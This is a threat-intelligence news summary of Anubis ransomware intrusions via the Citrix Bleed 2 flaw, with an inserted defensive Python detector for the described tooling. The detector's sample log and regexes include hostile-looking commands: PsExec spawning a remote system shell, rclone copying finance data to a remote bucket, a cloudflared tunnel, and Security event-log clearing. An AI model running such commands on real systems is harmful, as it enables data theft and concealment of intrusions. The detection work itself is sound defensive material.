Exploiting a Critical Citrix Vulnerability
Threat actors linked to the Anubis ransomware operation have been actively exploiting a critical authentication bypass flaw in Citrix NetScaler ADC and Gateway, tracked as CVE-2025-5777 with a CVSS score of 9.3. Arctic Wolf researchers reported that attackers are using this vulnerability, dubbed Citrix Bleed 2, to gain initial access to victim networks. The intrusions also involve valid VPN credentials, which may have been obtained from prior breaches or purchased from initial access brokers.
Blending In with Legitimate Tools
Once inside, affiliates of the Anubis ransomware-as-a-service group abuse legitimate remote monitoring and management tools such as ScreenConnect, Zoho Assist, and MeshAgent to maintain persistence and evade detection. Lateral movement is achieved through RDP and PsExec, followed by credential harvesting and deployment of data exfiltration tools like rclone and S3 Browser. The attackers also configure Cloudflare Tunnels to establish covert connections to compromised environments, all while disabling security software and clearing logs to hinder forensic analysis.
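As an added, defender-side example that is not part of the article: a small Python detector that flags the tooling chain described above (RMM binaries, PsExec, rclone/S3 Browser, cloudflared tunnels, event-log clearing) in constructed process-creation log lines and reports hosts where several of those techniques co-occur. The log format, binary names, regexes and allowlist are assumptions for illustration, not details taken from the article.

```python
import re
from dataclasses import dataclass

# Patterns for the tools named in the write-up. Binary names are assumed
# defaults, not values taken from the article; tune them to your telemetry.
SIGNATURES = {
    "rmm-tool":         re.compile(r"(screenconnect|zohoassist|za_access|meshagent)", re.I),
    "lateral-movement": re.compile(r"\bpsexe(c|svc)\b", re.I),
    "exfil-tool":       re.compile(r"\b(rclone|s3browser)\b", re.I),
    "covert-tunnel":    re.compile(r"\bcloudflared\b.*\btunnel\b", re.I),
    "log-clearing":     re.compile(r"\bwevtutil\b.*\b(cl|clear-log)\b", re.I),
}

@dataclass
class Finding:
    host: str
    technique: str
    command: str

def parse_line(line):
    # Assumed constructed format: "<timestamp> host=<h> user=<u> cmd=<command line>"
    m = re.match(r"^\S+\s+host=(\S+)\s+user=(\S+)\s+cmd=(.*)$", line)
    return m.groups() if m else None

def scan(lines, allowlist=()):
    # RMM tools are legitimate software, so hosts where they are expected
    # (e.g. a help-desk jump box) are allowlisted to keep the signal usable.
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        host, _user, cmd = parsed
        for technique, pattern in SIGNATURES.items():
            if pattern.search(cmd):
                if technique == "rmm-tool" and host in allowlist:
                    continue
                findings.append(Finding(host, technique, cmd))
    return findings

def hosts_with_chain(findings, min_techniques=3):
    # A single tool is weak evidence; several distinct techniques on one
    # host within the log window is the pattern worth escalating.
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.technique)
    return sorted(h for h, techs in by_host.items() if len(techs) >= min_techniques)

SAMPLE_LOG = [  # constructed sample events
    r"2025-07-01T10:02:11Z host=ws01 user=corp\jdoe cmd=C:\Program Files\ScreenConnect Client\ScreenConnect.ClientService.exe",
    r"2025-07-01T10:05:40Z host=helpdesk01 user=corp\svc_rmm cmd=C:\Program Files\ScreenConnect Client\ScreenConnect.ClientService.exe",
    r"2025-07-01T10:09:03Z host=ws01 user=SYSTEM cmd=C:\Windows\System32\svchost.exe -k netsvcs",
    r"2025-07-01T11:14:22Z host=fs02 user=corp\jdoe cmd=C:\Windows\Temp\PsExec.exe \\ws03 -s cmd.exe",
    r"2025-07-01T11:31:09Z host=fs02 user=corp\jdoe cmd=C:\Users\Public\rclone.exe copy D:\Finance remote:bucket",
    r"2025-07-01T11:40:57Z host=fs02 user=corp\jdoe cmd=C:\Users\Public\cloudflared.exe tunnel run --token <TOKEN_PLACEHOLDER>",
    r"2025-07-01T11:52:31Z host=fs02 user=corp\jdoe cmd=wevtutil.exe cl Security",
]
```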
Broader Trends in Ransomware Tradecraft
Separately, researchers have detailed the tactics of The Gentlemen RaaS group, which employs a Go-based backdoor for remote command execution and uses the bring-your-own-vulnerable-driver (BYOVD) technique to disable endpoint security products. The group exploited a zero-day in a Kontron driver to gain kernel-level access. In another development, the partnership between the VECT ransomware group and TeamPCP leverages credentials stolen from supply-chain attacks on Trivy and LiteLLM to deploy ransomware at scale, marking an evolution in industrialized cybercrime.
Source: The Hacker News
